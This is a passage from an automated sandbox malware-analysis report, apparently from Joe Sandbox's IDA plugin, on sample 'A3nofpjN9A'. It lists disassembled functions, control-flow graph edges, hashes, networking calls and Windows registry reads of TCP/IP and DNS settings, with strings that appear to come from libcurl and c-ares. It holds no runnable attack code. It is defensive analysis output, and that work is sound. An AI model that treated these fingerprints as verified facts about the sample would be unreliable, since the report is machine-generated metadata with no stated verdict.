                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: EventSelect$EnumEventsNetwork
                                                          • String ID: N==$multi.c
                                                          • API String ID: 2170980988-1096619029
                                                          • Opcode ID: 7c85d32cd3eaa17a85e0e645eff08dfc5ac1a29cfa3a2aa2b90ed6489dfb8ab0
                                                          • Instruction ID: b6c430a0327a06733f8539e8b2730cc9c02a5e215a7deaaefcbebd5bf18f5d94
                                                          • Opcode Fuzzy Hash: 7c85d32cd3eaa17a85e0e645eff08dfc5ac1a29cfa3a2aa2b90ed6489dfb8ab0
                                                          • Instruction Fuzzy Hash: AFD106716083819FE716CF61C881B6B77E9FF94344F054A2CF89497292E3B4E985CB52
                                                          Function 0049B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1677 49b180-49b195 1678 49b19b-49b1a2 1677->1678 1679 49b3e0-49b3e7 1677->1679 1680 49b1b0-49b1b9 1678->1680 1680->1680 1681 49b1bb-49b1bd 1680->1681 1681->1679 1682 49b1c3-49b1d0 1681->1682 1684 49b3db 1682->1684 1685 49b1d6-49b1f2 1682->1685 1684->1679 1686 49b229-49b22d 1685->1686 1687 49b3e8-49b417 1686->1687 1688 49b233-49b246 1686->1688 1696 49b41d-49b429 1687->1696 1697 49b582-49b589 1687->1697 1689 49b248-49b24b 1688->1689 1690 49b260-49b264 1688->1690 1691 49b24d-49b256 1689->1691 1692 49b215-49b223 1689->1692 1694 49b269-49b286 call 49af30 1690->1694 1691->1694 1692->1686 1695 49b315-49b33c call 758b00 1692->1695 1705 49b288-49b2a3 call 49b060 1694->1705 1706 49b2f0-49b301 1694->1706 1708 49b3bf-49b3ca 1695->1708 1709 49b342-49b347 1695->1709 1700 49b42b-49b433 call 49b590 1696->1700 1701 49b435-49b44c call 49b590 1696->1701 1700->1701 1717 49b458-49b471 call 49b590 1701->1717 1718 49b44e-49b456 call 49b590 1701->1718 1724 49b2a9-49b2c7 getsockname call 49b020 1705->1724 1725 49b200-49b213 call 49b020 1705->1725 1706->1692 1721 49b307-49b310 1706->1721 1719 49b3cc-49b3d9 1708->1719 1714 49b349-49b358 1709->1714 1715 49b384-49b38f 1709->1715 1722 49b360-49b382 1714->1722 1715->1708 1723 49b391-49b3a5 1715->1723 1734 49b48c-49b4a7 1717->1734 1735 49b473-49b487 1717->1735 1718->1717 1719->1679 1721->1719 1722->1715 1722->1722 1730 49b3b0-49b3bd 1723->1730 1736 49b2cc-49b2dd 1724->1736 1725->1692 1730->1708 1730->1730 1738 49b4a9-49b4b1 call 49b660 1734->1738 1739 49b4b3-49b4cb call 49b660 1734->1739 1735->1697 1736->1692 1737 49b2e3 1736->1737 1737->1721 1738->1739 1744 49b4d9-49b4f5 call 49b660 1739->1744 1745 49b4cd-49b4d5 call 49b660 1739->1745 1750 49b50d-49b52b call 49b770 * 2 1744->1750 1751 49b4f7-49b50b 1744->1751 1745->1744 1750->1697 1756 49b52d-49b531 1750->1756 1751->1697 1757 49b580 1756->1757 1758 49b533-49b53b 1756->1758 1757->1697 1759 49b578-49b57e 1758->1759 1760 49b53d-49b547 1758->1760 1759->1697 1760->1759 1761 49b549-49b54d 1760->1761 1761->1759 1762 49b54f-49b558 1761->1762 1762->1759 1763 49b55a-49b576 call 49b870 * 2 1762->1763 1763->1697 1763->1759
                                                          APIs
                                                          • getsockname.WS2_32(-00000020,-00000020,?), ref: 0049B2B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: ares__sortaddrinfo.c$cur != NULL
                                                          • API String ID: 3358416759-2430778319
                                                          • Opcode ID: 440873400392e013d4d0828aea7b1082e5eaeb740d681588426374989b5a8fd7
                                                          • Instruction ID: 33c22ea00360887357462b90334ef7554ee29fb56cef46543281560f4eb7401d
                                                          • Opcode Fuzzy Hash: 440873400392e013d4d0828aea7b1082e5eaeb740d681588426374989b5a8fd7
                                                          • Instruction Fuzzy Hash: 84C191716043059FDB14DF24DA84A6A7BE1EF88714F05887EE8898B3A1D738ED45CBC5
                                                          Function 003E6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38e23679ff19fdfd7051f4c5a6a75115703a9469dba58a9850f57536949ee48b
                                                          • Instruction ID: a11aecb887d6af4f53e5e4354830512f7b8576fe3fb6ff998e3c2a76b9ee5f99
                                                          • Opcode Fuzzy Hash: 38e23679ff19fdfd7051f4c5a6a75115703a9469dba58a9850f57536949ee48b
                                                          • Instruction Fuzzy Hash: 8791283060C3A98BD7378A2AC8847BB72D9FFC4364F168B2CE898471D4EB759D41D691
                                                          Function 0049A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0048712E,?,?,?,00001001,00000000), ref: 0049A90D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: recvfrom
                                                          • String ID:
                                                          • API String ID: 846543921-0
                                                          • Opcode ID: 19715340d6ac1877a086ae875830c70a5e6fcc12dbb7179d1fd55c30e908894d
                                                          • Instruction ID: 3fe1875e8b0cee6f5ce80654fbf701fc7a62d4b89225bede511571140ff7f6cc
                                                          • Opcode Fuzzy Hash: 19715340d6ac1877a086ae875830c70a5e6fcc12dbb7179d1fd55c30e908894d
                                                          • Instruction Fuzzy Hash: 0CF06DB5108308AFD6109E01DC48D6BBBEDFFC9758F06496DF948233118270AE10CAB6
                                                          Function 0048A440 Relevance: 48.3, APIs: 19, Strings: 8, Instructions: 1066registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0048AA19
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0048AA4C
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0048AA97
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0048AAE9
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0048AB30
                                                          • RegCloseKey.KERNELBASE(?), ref: 0048AB6A
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0048AB82
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0048AC46
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0048AD0A
                                                          • RegEnumKeyExA.KERNELBASE ref: 0048AD8D
                                                          • RegCloseKey.KERNELBASE(?), ref: 0048ADD9
                                                          • RegEnumKeyExA.KERNELBASE ref: 0048AE08
                                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0048AE2A
                                                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0048AE54
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0048AF63
                                                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0048AFB2
                                                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0048B072
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$Open$CloseEnum
                                                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                          • API String ID: 4217438148-1047472027
                                                          • Opcode ID: 05550cb35058540eba83595858a025c745ab68770673216824298270cfaa427f
                                                          • Instruction ID: 4094981915a10c776f37c28e02b80e5d39f2fcc03e822feb6328d56d11455c0a
                                                          • Opcode Fuzzy Hash: 05550cb35058540eba83595858a025c745ab68770673216824298270cfaa427f
                                                          • Instruction Fuzzy Hash: 4E72C1B1608301ABE310EB24CC85F5B77E8AF85744F144C2AFA45972A1EBB8E855CB57
                                                          Function 0040A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0040A832
                                                          Strings
                                                          • Trying [%s]:%d..., xrefs: 0040A689
                                                          • @, xrefs: 0040AC42
                                                          • Could not set TCP_NODELAY: %s, xrefs: 0040A871
                                                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0040AE1F
                                                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0040A6CE
                                                          • Local Interface %s is ip %s using address family %i, xrefs: 0040AE60
                                                          • Bind to local port %d failed, trying next, xrefs: 0040AFE5
                                                          • @, xrefs: 0040A8F4
                                                          • Local port: %hu, xrefs: 0040AF28
                                                          • bind failed with errno %d: %s, xrefs: 0040B080
                                                          • cf-socket.c, xrefs: 0040A5CD, 0040A735
                                                          • Trying %s:%d..., xrefs: 0040A7C2, 0040A7DE
                                                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0040ADAC
                                                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0040AD0A
                                                          • cf_socket_open() -> %d, fd=%d, xrefs: 0040A796
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203917477.0000000000E44000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2204035033.0000000000FFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3d0000_A3nofpjN9A.jbxd
                                                          Similarity
                                                          • API ID: setsockopt
                                                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3981526788-2373386790
                                                          • Opcode ID: 27d2b173f19a8f14d2cdcf87ff0e8995f93b51ac8b7603dec172077d8fec64e8
                                                          • Instruction ID: 60f7b6d578ec984613823cf852a0db077b75f1965156ff40aed6e738d820cbe1
                                                          • Opcode Fuzzy Hash: 27d2b173f19a8f14d2cdcf87ff0e8995f93b51ac8b7603dec172077d8fec64e8
                                                          • Instruction Fuzzy Hash: 5C620371508341ABE721CF24C846BABB3E4EF85304F04492EF988A72D2E775E955CB97
                                                          Function 00499740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 939 499740-49975b 940 49975d-499768 call 4978a0 939->940 941 499780-499782 939->941 950 4999bb-4999c0 940->950 951 49976e-499770 940->951 943 499788-4997a0 call 758e00 call 4978a0 941->943 944 499914-49994e call 758b70 RegOpenKeyExA 941->944 943->950 956 4997a6-4997c5 943->956 953 49995a-499992 RegQueryValueExA RegCloseKey call 758b98 944->953 954 499950-499955 944->954 957 499a0c-499a15 950->957 955 499772-49977e 951->955 951->956 969 499997-4999b5 call 4978a0 953->969 954->957 955->943 962 499827-499833 956->962 963 4997c7-4997e0 956->963 965 49985f-499872 call 495ca0 962->965 966 499835-49985c call 48e2b0 * 2 962->966 967 4997e2-4997f3 call 758b50 963->967 968 4997f6-499809 963->968 980 499878-49987d call 4977b0 965->980 981 4999f0 965->981 966->965 967->968 968->962 979 49980b-499810 968->979 969->950 969->956 979->962 984 499812-499822 979->984 986 499882-499889 980->986 983 4999f5-4999fb call 495d00 981->983 994 4999fe-499a09 983->994 984->957 986->983 990 49988f-49989b call 484fe0 986->990 990->981 997 4998a1-4998c3 call 758b50 call 4978a0 990->997 994->957 1003 4998c9-4998db call 48e2d0 997->1003 1004 4999c2-4999ed call 48e2b0 * 2 997->1004 1003->1004 1009 4998e1-4998f0 call 48e2d0 1003->1009 1004->981 1009->1004 1015 4998f6-499905 call 4963f0 1009->1015 1019 49990b-49990f 1015->1019 1020 499f66-499f7f call 495d00 1015->1020 1021 499a3f-499a5a call 496740 call 4963f0 1019->1021 1020->994 1021->1020 1028 499a60-499a6e call 496d60 1021->1028 1031 499a1f-499a39 call 496840 call 4963f0 1028->1031 1032 499a70-499a94 call 496200 call 4967e0 call 496320 1028->1032 1031->1020 1031->1021 1043 499a16-499a19 1032->1043 1044 499a96-499ac6 call 48d120 1032->1044 1043->1031 1045 499fc1 1043->1045 1050 499ac8-499adb call 48d120 1044->1050 1051 499ae1-499af7 call 48d190 1044->1051 1047 499fc5-499ffd call 495d00 call 48e2b0 * 2 1045->1047 1047->994 1050->1031 1050->1051 1051->1031 1058 499afd-499b09 call 484fe0 1051->1058 1058->1045 1063 499b0f-499b29 call 48e730 1058->1063 1068 499b2f-499b3a call 4978a0 1063->1068 1069 499f84-499f88 1063->1069 1068->1069 1076 499b40-499b54 call 48e760 1068->1076 1071 499f95-499f99 1069->1071 1073 499f9b-499f9e 1071->1073 1074 499fa0-499fb6 call 48ebf0 * 2 1071->1074 1073->1045 1073->1074 1086 499fb7-499fbe 1074->1086 1082 499f8a-499f92 1076->1082 1083 499b5a-499b6e call 48e730 1076->1083 1082->1071 1089 499b8c-499b97 call 4963f0 1083->1089 1090 499b70-49a004 1083->1090 1086->1045 1098 499c9a-499cab call 48ea00 1089->1098 1099 499b9d-499bbf call 496740 call 4963f0 1089->1099 1095 49a015-49a01d 1090->1095 1096 49a01f-49a022 1095->1096 1097 49a024-49a045 call 48ebf0 * 2 1095->1097 1096->1047 1096->1097 1097->1047 1108 499f31-499f35 1098->1108 1109 499cb1-499ccd call 48ea00 call 48e960 1098->1109 1099->1098 1116 499bc5-499bda call 496d60 1099->1116 1111 499f40-499f61 call 48ebf0 * 2 1108->1111 1112 499f37-499f3a 1108->1112 1125 499cfd-499d0e call 48e960 1109->1125 1126 499ccf 1109->1126 1111->1031 1112->1031 1112->1111 1116->1098 1128 499be0-499bf4 call 496200 call 4967e0 1116->1128 1137 499d10 1125->1137 1138 499d53-499d55 1125->1138 1129 499cd1-499cec call 48e9f0 call 48e4a0 1126->1129 1128->1098 1145 499bfa-499c0b call 496320 1128->1145 1150 499cee-499cfb call 48e9d0 1129->1150 1151 499d47-499d51 1129->1151 1143 499d12-499d2d call 48e9f0 call 48e4a0 1137->1143 1142 499e69-499e8e call 48ea40 call 48e440 1138->1142 1167 499e90-499e92 1142->1167 1168 499e94-499eaa call 48e3c0 1142->1168 1164 499d5a-499d6f call 48e960 1143->1164 1165 499d2f-499d3c call 48e9d0 1143->1165 1159 499c11-499c1c call 497b70 1145->1159 1160 499b75-499b86 call 48ea00 1145->1160 1150->1125 1150->1129 1156 499dca-499ddb call 48e960 1151->1156 1173 499ddd-499ddf 1156->1173 1174 499e2e-499e36 1156->1174 1159->1089 1186 499c22-499c33 call 48e960 1159->1186 1160->1089 1182 499f2d 1160->1182 1196 499d71-499d73 1164->1196 1197 499dc2 1164->1197 1165->1143 1193 499d3e-499d42 1165->1193 1178 499eb3-499ec4 call 48e9c0 1167->1178 1190 49a04a-49a04c 1168->1190 1191 499eb0-499eb1 1168->1191 1183 499e06-499e21 call 48e9f0 call 48e4a0 1173->1183 1179 499e38-499e3b 1174->1179 1180 499e3d-499e5b call 48ebf0 * 2 1174->1180 1178->1031 1199 499eca-499ed0 1178->1199 1179->1180 1188 499e5e-499e67 1179->1188 1180->1188 1182->1108 1222 499de1-499dee call 48ec80 1183->1222 1223 499e23-499e2c call 48eac0 1183->1223 1209 499c35 1186->1209 1210 499c66-499c75 call 4978a0 1186->1210 1188->1142 1188->1178 1202 49a04e-49a051 1190->1202 1203 49a057-49a070 call 48ebf0 * 2 1190->1203 1191->1178 1193->1142 1204 499d9a-499db5 call 48e9f0 call 48e4a0 1196->1204 1197->1156 1207 499ee5-499ef2 call 48e9f0 1199->1207 1202->1045 1202->1203 1203->1086 1237 499d75-499d82 call 48ec80 1204->1237 1238 499db7-499dc0 call 48eac0 1204->1238 1207->1031 1231 499ef8-499f0e call 48e440 1207->1231 1217 499c37-499c51 call 48e9f0 1209->1217 1227 499c7b-499c8f call 48e7c0 1210->1227 1228 49a011 1210->1228 1217->1089 1250 499c57-499c64 call 48e9d0 1217->1250 1241 499df1-499e04 call 48e960 1222->1241 1223->1241 1227->1089 1252 499c95-49a00e 1227->1252 1228->1095 1248 499f10-499f26 call 48e3c0 1231->1248 1249 499ed2-499edf call 48e9e0 1231->1249 1254 499d85-499d98 call 48e960 1237->1254 1238->1254 1241->1174 1241->1183 1248->1249 1265 499f28 1248->1265 1249->1031 1249->1207 1250->1210 1250->1217 1252->1228 1254->1197 1254->1204 1265->1045
                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00499946
                                                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00499974
                                                          • RegCloseKey.KERNELBASE(?), ref: 0049998B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2203142510.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                          • Associated: 00000000.00000002.2203124216.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203142510.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203611507.0000000000AAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2203627232.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
